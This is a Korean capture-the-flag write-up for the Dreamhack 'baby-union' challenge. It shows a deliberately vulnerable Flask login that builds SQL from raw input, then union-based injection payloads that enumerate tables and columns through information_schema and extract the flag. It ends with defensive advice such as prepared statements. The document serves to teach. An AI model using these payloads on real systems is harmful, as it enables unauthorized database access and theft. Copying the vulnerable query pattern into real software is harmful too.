[Dreamhack] Level1: baby-union

🛎️ Access

로그인 시 계정의 정보가 출력되는 웹 서비스입니다.
SQL INJECTION 취약점을 통해 플래그를 획득하세요. 
문제에서 주어진 init.sql 파일의 테이블명과 컬럼명은 실제 이름과 다릅니다.
_
플래그 형식은 DH{...} 입니다

 

 

👾 Exploit Algorithm & Payload

> app.py

import os
from flask import Flask, request, render_template
from flask_mysqldb import MySQL

app = Flask(__name__)
app.config['MYSQL_HOST'] = os.environ.get('MYSQL_HOST', 'localhost')
app.config['MYSQL_USER'] = os.environ.get('MYSQL_USER', 'user')
app.config['MYSQL_PASSWORD'] = os.environ.get('MYSQL_PASSWORD', 'pass')
app.config['MYSQL_DB'] = os.environ.get('MYSQL_DB', 'secret_db')
mysql = MySQL(app)

@app.route("/", methods = ["GET", "POST"])
def index():

    if request.method == "POST":
        uid = request.form.get('uid', '')
        upw = request.form.get('upw', '')
        if uid and upw:
            cur = mysql.connection.cursor()
            cur.execute(f"SELECT * FROM users WHERE uid='{uid}' and upw='{upw}';")
            data = cur.fetchall()
            if data:
                return render_template("user.html", data=data)

            else: return render_template("index.html", data="Wrong!")

        return render_template("index.html", data="Fill the input box", pre=1)
    return render_template("index.html")


if __name__ == '__main__':
    app.run(host='0.0.0.0')

> init.sql

CREATE DATABASE secret_db;
GRANT ALL PRIVILEGES ON secret_db.* TO 'dbuser'@'localhost' IDENTIFIED BY 'dbpass';

USE `secret_db`;
CREATE TABLE users (
  idx int auto_increment primary key,
  uid varchar(128) not null,
  upw varchar(128) not null,
  descr varchar(128) not null
);

INSERT INTO users (uid, upw, descr) values ('admin', 'apple', 'For admin');
INSERT INTO users (uid, upw, descr) values ('guest', 'melon', 'For guest');
INSERT INTO users (uid, upw, descr) values ('banana', 'test', 'For banana');
FLUSH PRIVILEGES;

CREATE TABLE fake_table_name (
  idx int auto_increment primary key,
  fake_col1 varchar(128) not null,
  fake_col2 varchar(128) not null,
  fake_col3 varchar(128) not null,
  fake_col4 varchar(128) not null
);

INSERT INTO fake_table_name (fake_col1, fake_col2, fake_col3, fake_col4) values ('flag is ', 'DH{sam','ple','flag}');

 

 

#1

---

: '/' 페이지에서 uid와 upw를 입력하면 계정 정보가 확인 될 것으로 예상된다.

 

: 힌트 파일에서 이미 몇가지 계정 정보를 확인 했기 때문에 주석처리 동작이나 싱글쿼터가 동작하는지 확인했다.

 

: 이외에도 uid, upw 값의 쿼리가 참으로 동작하는 방식으로도 계정 정보가 출력됨을 알 수 있다.

 

 

#2

---

...
CREATE TABLE fake_table_name(
    idx int auto_increment primary key,
    fake_col1 varchar(128) not null,
    fake_col2 varchar(128) not null,
    fake_col3 varchar(128) not null,
    fake_col4 varchar(128) not null
);

INSERT INTO fake_table_name (fake_col1, fake_col2, fake_col3, fake_col4) values ('flag is ', 'DH{sam','ple','flag}');
...

: 문제에서 users 테이블 이외의 테이블이 있는 것을 확인했다.

: 하지만 이 테이블의 테이블명과 컬럼명은 실제 이름과 다르다는 것을 힌트 코드에서 알려줬기 때문에
"SELECT * FROM users WHERE uid='{uid}' and upw='{upw}';" 의 입력 안에서 테이블 명을 얻어야함을 알 수 있다.

 

uid : 1' or '1
upw: ' UNION SELECT 1,2,3,4#

: 우선 fake_table_naem이라는 임의의 테이블이 4개의 컬럼이라는 것을 힌트 코드를 통해 확인했다.

: 컬럼이 4개가 맞는지 직접 확인하기 위해 UNION절을 사용했다.

: 결과로 컬럼1,2,4는 #,id,description에서 확인할 수 있다. (열 4개)

 

 

#3

---

uid: 1' or '1
upw: ' UNION SELECT 1,table_name,3,4 FROM information_schema.tables#

: 다음과 같이 ...table_name...information_schema.tables...를 활용하면 데이터베이스의 모든 테이블명을 확인할 수 있게 된다.

: 테이블명을 잘 살펴보면 flag와 관련된 테이블명임을 유추할 수 있다. (테이블명: onlyflag)

 

 

#4

---

uid: 1' or '1
upw: ' UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='onlyflag'#

: 다음과 같이 ...column_name...information_schema.columns...table_name='[해당 테이블 명]'#를 활용하면 해당 테이블의 모든 컬럼명을 확인할 수 있다. (idx, sname, svalue, sflag, sclose)

 

 

🔑Analysis and results for obtaining the Flag DH{…}

---

uid: 1' or '1
1)
upw: ' UNION SELECT sname,svalue,sflag,sclose FROM onlyflag#

2)
upw: ' UNION SELECT svalue,sflag,3,sclose FROM onlyflag#

: 1) 처럼 작성하여 onlyflag 테이블의 sname,svalue,sflag,sclose 컬럼의 값을 확인하면 일부의 FLAG를 획득할 수 있었다.

: 그러나 #2 풀이에서 "결과로 컬럼1,2,4는 #,id,description에서 확인"이 가능했기 때문에 2)와 같이 작성해주면 완벽한 FLAG를 획득할 수 있다.

 

 

📌 Summary

---

Union-based SQL Injection

 SQL 쿼리의 UNION 연산자를 이용하여 원래의 쿼리 결과에 추가 결과를 합치는 명령어로 공격자는 데이터베이스의 다른 테이블 정보들을 확인할 수 있게 됨.

 

-대응방안-

1) 입력 값 검증

2) 파라미터화된 쿼리 사용(prepared statements)

: 데이터베이스에 직접적인 사용자 입력을 포함시키지 말고, 대신 준비된 파라미터(prepared statements)를 사용

3) 최소한의 권한  적용

4) 웹 방화벽 사용

...